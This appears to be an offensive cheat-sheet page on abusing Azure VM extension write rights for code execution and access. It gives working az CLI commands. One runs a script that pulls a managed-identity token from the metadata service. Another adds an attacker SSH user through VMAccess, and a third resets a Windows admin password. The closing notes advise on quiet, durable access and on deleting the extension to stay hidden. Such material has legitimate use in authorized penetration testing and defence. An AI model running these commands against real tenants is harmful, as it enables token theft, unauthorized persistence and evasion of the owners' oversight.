Microsoft.Compute/virtualMachines/extensions/write installs an extension that the guest agent runs as SYSTEM or root. The Custom Script Extension downloads and runs an arbitrary script; the VMAccess extension resets the local administrator password or SSH key, giving interactive access. This is a distinct right from run command, so a principal denied one often still holds the other.
Custom Script Extension#
az vm extension set -g <rg> --vm-name <vm> \
--name CustomScript --publisher Microsoft.Azure.Extensions \
--settings '{"commandToExecute":"id && curl -s -H Metadata:true http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"}'
VMAccess: reset access#
# Linux: set a new user/key
az vm extension set -g <rg> --vm-name <vm> \
--name VMAccessForLinux --publisher Microsoft.OSTCExtensions \
--protected-settings '{"username":"att","ssh_key":"ssh-ed25519 AAAA..."}'
# Windows equivalent: az vm user update -g <rg> -n <vm> -u admin -p 'Newpass123!'
Exploitation notes#
- Same end state as run command; choose whichever action your role allows.
- VMAccess is the quieter route to a durable interactive logon when you want a session rather than one-shot execution.
- An extension is a visible resource on the VM; remove it after use if stealth matters.
Tools#
- Azure CLI (
az vm extension set). - MicroBurst: VM command execution and extension helpers.